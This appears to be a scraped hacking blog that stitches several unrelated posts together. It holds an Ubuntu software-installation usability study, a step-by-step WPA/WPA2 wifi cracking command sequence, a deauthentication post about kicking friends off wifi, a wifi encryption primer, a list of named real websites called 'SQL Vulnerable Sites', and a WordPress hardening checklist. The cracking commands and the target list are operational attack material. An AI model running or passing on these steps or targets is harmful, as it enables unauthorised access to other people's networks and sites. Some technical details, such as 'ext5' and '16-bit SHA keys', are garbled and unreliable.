A Usability Study On Ubuntu Operating System and Third Part Software Manager Using the Cognitive Walkthrough Method

A Usability Study On Ubuntu Operating System and Third Part Software Manager Using the Cognitive Walkthrough Method


                                                       
Abstract

Operating system – As name self explains, it manages the operation between Computer hardware and software resources. Application program is one of the components of operating system. Application program requires operating system to function. Major operating system are Linux operating system, Windows operating system, Mac.
 Ubuntu is an open-source Linux operating system, which is based on debian stable Linux distribution. Currently Ubuntu run across platforms such as laptops/desktops, servers and mobiles. Linux is similar to Unix but was developed without any Unix Code. Linux is an open license model, which has a general public license in which the Linux kernel code is available for studying and modification. Some of the popular Linux distributions are, red hat, Ubuntu, Linux mint, kali.

Introduction

How to install a third party software is one of the major tasks carried out in any operating system. The approach and procedure is different for the major operating system distributions, say windows, Linux and mac. So let’s walkthrough along to install a third party software in Ubuntu operating system which is based debian Linux distributions. Ubuntu comes with a default list of useful programs. However, most of the times, a specific software for serving the specific purpose is needed which is not served by default applications.

Software is a program which can be run on computer. However, for the smooth run of this software, it requires other resources in the operating system to work for it. So there are hundreds of files required just to make the program work. Upon that, the files has to be loaded onto the right locations, depending on different operating system architecture. Ubuntu stores all the needed files into a package, which has to be run. Thus package combines all files into a single file, which can be handled more easily.

Core tasks during the cognitive walkthrough are:

1. Validation of the software and installation of the system software.
2. Configuration of the fundamental services for the smooth and efficient run of the operating system.
3. The right way to start up and shutdown the operating system.
4. General Installation procedure for a user application.

Usability Guidelines
Guidelines used to evaluate the core task are as follows:

G1 - Users should be aware of the steps they have to perform to complete a core task.
G2 - Users should be able to determine how to perform these steps.
G3 - Users should know when they have successfully completed a core task.
G4 - Users should be able to recognize, diagnose, and recover from non-critical errors.
G5 - Users should not make dangerous errors from which they cannot recover.
G6 -Users should be comfortable with the terminology used in any interface dialogues or documentation.
G7 - Users should be sufficiently comfortable with the interface to continue using it.
G8 - Users should be aware of the application’s status at all times.


Ubuntu Operating System Installation:

The latest version of Ubuntu is 16.04.1 and is downloaded from the Ubuntu website. There are a couple of requirements to be met before kick starting the installation procedure. Validation of the software to check its health is important to start on. At times there are possibilities a software download can go corrupted. At the outset, if the hardware requirements fail, there is no point in continuing the installation, else if continued, the system would throw various errors during the operation of the system. Once this is met, the user interface of Ubuntu guides the user step by step. [G1,G3]

Ubuntu offers two types of installing the operating system
1. To externally install alongside another operating system
2. To inside the same operating system.

The advantage of installing inside an operating system is that, the files of the base operating system can be accessed through Ubuntu as it is. Therefore, by saving the switch over time between the operating systems and help solve duplicating the dataset. The next important aspect to be noted is the file system of Ubuntu. As in general NTFS/ fat 32 is used by Windows, likewise Ubuntu Linux considers ext3, ext4, ext5 as its file system. This is one of the critical step, a user should be aware of, as there are possibilities to lose valuable data in the hard disk. One of of the possibilities is, a user tends to have couple of operating systems to work on his machine. It is very important to know the number of partitions in the hard disk and its sizes. If confused with the partition name and formatted, then the user losses all data in that partition. After setting up these, the control shifts back to the system software to extract and copy the system files. Once done, asks the user to restart the operating system now or later, to complete the installation process.[G2,G5]



Configuration: Once the installation is done it is necessary to check for the available updates for the system. Configure default settings and preferences of audio, video, network applications. One of the good feature of Ubuntu is the use of terminal for most of the activities. Whether to update, install, traverse files terminal is a handy tool used extensively.  [G8]






Role of binary file - Let’s look into the importance of the source code and binary file for installing a software. Generally, when a package is created, for a particular software or program, source code will be stored, for the program in the package. Source code is nothing but a set of instructions for the computer, in order to execute the software, which is written in human readable language. Machines cannot understand this human native-language and hence the need to interpret the source code. This task is taken care by interpreter or compiler. One of the best ways of achieving this is by converting the source file into a binary file, in which machines can understand. Binary packages are ones which have been made specifically for one type of computer, or architecture. [G1]

Package Dependencies Sometime a program needs same file to support the installation of its own software. Instead of storing each file into each package, a separate package can be installed to provide, so that any program in need of that file, can use them directly. So, to install a program which needs one of these files, the package containing those files must also be installed. When a package depends on another in this way, it is known as a package dependency. By specifying dependencies, packages can be made smaller and simpler, and duplicates of files and programs are mostly removed. When we install a program, its dependencies must be installed at the same time. Usually, most of the required dependencies will already be installed, but a few extras may be needed. [G1,G5]




 Package Managers - A package manager is an application which comes along with the operating system which deals with the downloading and installation of packages. Ubuntu includes a couple of package managers by default, and which we use depends on how advanced the package management tasks are that we want to achieve. The basic package manager, we are going to use here is the Add/Remove tool, which is very easy to use.[G1]

Repositories - Ubuntu stores all its packages at a location called repositories. Repository stores packages of similar types, which can be downloaded and installed using a package manager. A package manager will store an index of all of the packages available from a repository/ software channel. At times the index are rebuilt, to make sure that it is up to date and knows which packages have been upgraded or added into the channel since it last checked. In addition to the official Ubuntu repositories, it is possible to use third party repositories. Be careful, though - some are not compatible with Ubuntu and using them may cause programs to stop working or may even cause serious damage to your installation. [G6]

Installing a Package - This section explains how to install packages using the various tools available in Ubuntu. [G1,G6]
·         Graphical method
·         Text Based Methods (Terminal)
Let’s walkthrough the graphical method first. Not all the packages can be installed through graphical method. For such packages, text based methods are suitable. In Ubuntu we find most of the packages at "Software Centre ". Software from additional repositories may be installed. Once this has finished, click Close. Our new programs are installed and are ready to use.


Advanced graphical method - The Synaptic package manager is a more user friendly method for installation of the software packages. If any problem in finding the package with Add/Remove tool, we need to try using the search in Synaptic.[G6]

Text Based Methods - Text based methods demands the knowledge of how to use the terminal and its commands. While install packages, we should consider using an AptURL over apt-get or aptitude.[G5]

Aptitude - the text-based method - Aptitude is a text-based package manager, which must be run from a Terminal.

ptitude.png


apt-get method
The apt-get program is a command-line package manager, which should be used if the Add/Remove tool and Synaptic ever run into problems. It provides an advanced interface to APT, the underlying package management system which Ubuntu uses, but is reasonably easy to operate.
Installing downloaded packages
We may wish to install a package you have downloaded from a website, rather than from a software repository. These packages are called .debfiles. GDebi is a simple tool to install .deb files. It has a graphical user interface but can also be used in terminal. It lets us to install local deb packages resolving and installing its dependencies. It automatically checks packages for their dependencies and will try to download them from the Ubuntu software repositories if possible. We may first need to install GDebi - simply install the gdebi package using one of the package managers listed above, or open a Terminal and type sudo apt-get install gdebi.

Double-click the package to open it with GDebi. If all dependencies have been met for the selected package, click the 'Install package' button to install it. GDebi will warn, if there are unmet dependencies, which means that there's dependencies that aren't resolved in the repositories that we are  using. If all met and resolved, the software is installed and ready to use.[G1,G4,G6]


-Amit Vijayan


References:

How to hack Any Wifi Network (WPA/WPA2)

Wifi Hacking (WPA/WPA2)


Wifi is surely a difficult task , but not for the one's who are using Kali linux. 
There are many wifi protocols followed in order to  protect the network but with some tools any wifi network can be Hacked.
"Rules are meant to be broken

For WPA/WPA2 hacking, we need  Kali Linux, Network Adapter 
Execute the following commands

1. ifconfig wlan up (just to ensure our wlan is active)

2. airmon-ng      (to ensure our network card is working)

3. airmon-ng check kill (kills the process that may harm our attack)

4. airmon-ng start wlan1 (starts monitor mode)

5. airodump-ng wlan1

6. airodump-ng --bssid "MAC id of the router" --channel "on which channel it is on " wlanmon1

this command dumps the information of the router , for eg number of devices connected on this network along with the device mac id.

7. airodump-ng --channel "channel number"  --bssid "Station Address" -w /root/WPAsample wlan1mon

now the information is stored in root under the file name of WPAsample

Now open a new terminal 

8. aireplay-ng   --deauth 2000 -a "Mac Address " -c "Victim's Mac Address " wlan1mon

aireplay is a  tool used in Kali Linux which is used to send de-authentication packets. The purpose of de-authentication packets is to kick the existing user out from the network and force him to reconnect.

Open in new terminal 

9. aireplay-ng -0 1 -a " BSSID " -c "Victims Address " wlan1mon

10. aircrack-ng  -w " Location of the password list" " Location of the file "

Video Tutorial of WPA/WPA2 for reference 

                     

    ================================================

How to kick your friend from using from Wifi?

Kali Linux  De-Authentication Attack


How to Kick your friend from Using your wifi without him knowing about it . 


Its very hard to say no, specially to your Friends. You can do nothing if they ask for your Wifii password and then choose to stay because they are too lazy to go back home. 
Now there is a way to stop there usage without them knowing about that. :)

De-authentication is a simple attack used in Kali Linux which kicks the desired target from your Wifii Network. If you are creative, you can even use this attack for hacking Wifii passwords
(This post is for education purpose only, I am not responsible for any of your actions)

Tools Required :
1. Vmware 

2. Kali linux 

3. Network Adapter (which is Compatible with Kali)
(Alpha or Tp-Link)


Watch this video, and if you need any help, support is available 24x7. 




Wireless Hacking

What is Wireless?



Wireless communication is the transfer of information or power between two or more points that are not connected by an electrical conductor.

The most common wireless technologies use radio. With radio waves distances can be short, such as a few meters for television or as far as thousands or even millions of kilometers for deep-space radio communications. It encompasses various types of fixed, mobile, and portable applications, including two-way radios, cellular telephones, personal digital assistants (PDAs), and wireless networking. Other examples of applications of radio wireless technology include GPS units, garage door openers, wireless computer mice,keyboards and headsets, headphones, radio receivers, satellite television, broadcast television and cordless telephones

Wireless Hacking 



An internet connection has become a basic necessity in our modern lives. Wireless hot-spots (commonly known as Wi-Fi) can be found everywhere! If you have a PC with a wireless network card, then you must have seen many networks around you. Sadly most of these networks are secured with a network security key. Have you ever wanted to use one of these networks? You must have desperately wanted to check your mail when you shifted to your new house. The hardest time in your life is when your internet connection is down. Hacking those Wi-Fi passwords is your answer to temporary internet access.


Now to hack a Wifi Password you must first know what type of encryption it uses for its passwords there are many different types such as: WEP (easiest to crack/hack), WPA and WPA2.


Types Of Encyption 

- WEP
- WPA
- WPA2

WEP

Wired Equivalent Privacy (WEP) is a security protocol, specified in the IEEE Wireless Fidelity (Wi-Fi) standard, 802.11b, that is designed to provide a wireless local area network (WLAN) with a level of security and privacy comparable to what is usually expected of a wired LAN.

WPA


The Wi-Fi Alliance intended WPA as an intermediate measure to take the place of WEP pending the availability of the full IEEE 802.11i standard. WPA could be implemented through firmware upgrades on wireless network interface cards designed for WEP that began shipping as far back as 1999. However, since the changes required in the wireless access points (APs) were more extensive than those needed on the network cards, most pre-2003 APs could not be upgraded to support WPA.

The WPA protocol implements much of the IEEE 802.11i standard. Specifically, the Temporal Key Integrity Protocol (TKIP) was adopted for WPA. WEP used a 64-bit or 128-bit encryption key that must be manually entered on wireless access points and devices and does not change. TKIP employs a per-packet key, meaning that it dynamically generates a new 128-bit key for each packet and thus prevents the types of attacks that compromised WEP.

WPA2

WPA2 replaced WPA. WPA2, which requires testing and certification by the Wi-Fi Alliance, implements the mandatory elements of IEEE 802.11i. In particular, it includes mandatory support for CCMP, an AES-based encryption mode with strong security. Certification began in September, 2004; from March 13, 2006, WPA2 certification is mandatory for all new devices to bear the Wi-Fi trademark
==x==x==x==x==x==x==x==x==x==x==x==x==x==x==x==x==x==x==x==x==x==x==x==x==x

LETS START WIFI HACKING

(to be continued............)




SQL Vulnerable Sites [Part-3]

SQL Vulnerable Sites [Part-3]



http://lemaspinede.fr/reservation.php?id=6
http://purchase.filmweb.no/TicketSal...?showid=679909
http://rent-in-odessa.com/ru/details.php?id=504
http://rocknload.oversa.be/reservati...Form&showId=90
https://secure.modwest.com/sagespasa...php?exp_id=156
http://secure.terrys.net/viewProduct...ctID=PT.39-210
http://shop.westcoastmetric.com/usef...?linkID=Link.7
http://site2host.com/cms.php?cat_id=1607
http://softbe.pl/produkt.php?id=3
http://spcala.com/ecommerce/store.ph...start=0&pic=53
https://ssl.sv24.com/dynatech/produk....php?prod=3841
http://tagursmile.com/viewproduct.php?id=210&cityid=1
http://www.advertuganda.com/buyoffers.php?pg=2&cid=0
http://www.brightpointforchildren.or...communityid=87
http://www.bulbrok.com/paymethod.php?shipID=2
http://www.bvivacation.com/british-v...wnews.php?id=7
http://www.cancun-fishing-charter-co...ation.php?id=7
http://www.caravan-24.de/wagen.php?aktion=showdetails
http://www.cd-lab.com/viewProduct.php?product=345
http://www.christianword.org/new/tes...timony&id=1161
http://www.ck-modelcars.de/sites/produkt.php?id=8022
https://www.cooperslake.com/home/sli....php?photoid=0
http://www.corissia.com/web/en/reser...m=instructions
http://www.cubabedroom.com/reservation.php?id=20
http://www.d3d.co.il/Product.aspx?cid=3&pid=4
http://www.dfpk.eu/produkt.php?id=12
http://www.dio-dipo.co.il/ProductInfo.asp?ProdId=1426
http://www.disc-order.com/en/detail....MERO=101004687
http://www.epicurean.com.hk/new/reservation.php?id=43
www.esthetic-beauty.de/produkt.php?id=9&pid=
http://www.eurostarrental.com/findra...s=3&FindRates=
http://www.freedio.co.il/ProductInfo.asp?ProdId=2235
http://www.goa-tourism.com/reservation.php?id=1
http://www.harter.it/de/produkte.php?c=18
http://www.helloromania.eu/promo/pro...ads=142&page=3
http://www.hummeraccessories.cc/prod...?class=5&cat=9
http://www.johnellis.com/viewproduct.php?p=5&c=1
http://www.kkdayahotel.com/reservation.php?id=3
http://www.koracing.net/viewproduct....er=3&product=1
http://www.kwikpay.com.au/demo2.php?Country=au
http://www.lakesideharley-davidson.c...egory_id=47860
https://www.madisoncomedy.com/comicl...trow=0&alpha=G
http://www.maordeal.co.il/Product.asp?productid=2364
http://www.mbtagifts.com/shop.php?c=12&pt=16&t=1
http://www.meinsanitaetshaus.de/produkt.php?id=3576
http://www.misradia.co.il/product?selected=15548
http://www.nepaligroups.com/folk-son...tion=play&id=1
http://www.officer.co.il/shop/Produc...sp?Category=35
http://www.paravion.ro/userinfo.php?uid=1
http://www.perfectionlearning.com/vi...ductID=3860801
www.pharmaceris.pl/en/line.php?id=115&podzial=5
http://www.pnb.org/Season/Subscripti...px?pkg=13EFULL
http://www.qhealth.co.nz/html/viewProduct.php?id=1344
https://www.scottdawson.org/products/view.php?cn=11
http://www.bitshacking.com/index.php?pid=3
http://www.sk8erboy.eu/shop/kategori...verses&lang=en
http://www.sundaybreakfastmission.org/story.php?did=79
http://www.theonestore.it/result.php?cat=3
http://www.vacances-directes.com/fr/...ex.php?idemp=5
http://www.vangi.com.au/detail.php?no=89
http://www.warwick.de/modules/produk...ID=14460&cl=EN

WordPress Security Checklist

WordPress Security Checklist

Image result for wordpress




WordPress Security Checklist

Basic Checklist :

1.  Rename user Admin to something else.
2.  Change the ID field on the first user from 1 to something else.
3.  Enforce strong password requirements for all system users
4.  Don‟t let anybody but admins see available WP updates.
5.  Remove the ability for non-admins to modify theme files.
6.  Tweak the database so tables aren‟t prefixed with wp_.
7.  Don‟t use the MySQL root user to access the database.
8.  Limit the MySQL account used to the site database only.
9.  Restrict the MySQL account so it can‟t perform destructive actions (i.e. DROP,
etc.)
10. Give the MySQL account a very long, randomised password.
11. Don‟t allow the servers root user access via SSH. Use an account with SUDO
privileges instead.
12. Ensure all the secret key fields in wp-config.php are completed with 16-bit SHA
keys.
13. Disallow indexes on all site folders.
14. Hide the admin area.
15. Rename the wp-content directory to something else.
16. Block bad hosts and agents with blacklists.
17. Make any .htaccess files and wp-config.php non-writeable.
18. Make the admin area inaccessible outside of work hours (handle this one with care)
19. Schedule regular database backups.
20. Restrict the length of allowed URLs to 255 characters or less.
21. Require SSL connections on the admin area (if possible; this one has an on-cost attached)
22. If possible, install and run server-side antivirus software such as ClamAV.
23. Consider restricting the servers FTP service to only accept connections from certain, whitelisted IP addresses (only applicable if you have at least one static IP).
24. When deploy complete, consider stopping the servers FTP service completely.
You can always temporarily switch it on again if required.
25. If your web server is allowing proxying (for example, if youre load-balancing),
ensure it‟s not configured as an open HTTP proxy.
26. Remove any open SMTP proxies on your server.


Amit Vijayan

Amit Vijayan
Hack Ethically

About Me


I am an engineering student and i am very dedicated about Ethical Hacking. I have been learning "Ethical Hacking" for about 4 years now.
Though I'am not a pro hacker but also not a noob. I have enough knowledge to give others like me, a start for their Ethical Hacking & Cyber Security. As i keep learning new things, i keep updating them on the blog from basic to advanced level.
I started Ethical Hacking as a hobby which has now turned into my passion and i'am sure i will turn it into my profession through this blog.

Always be an Ethical Hacker.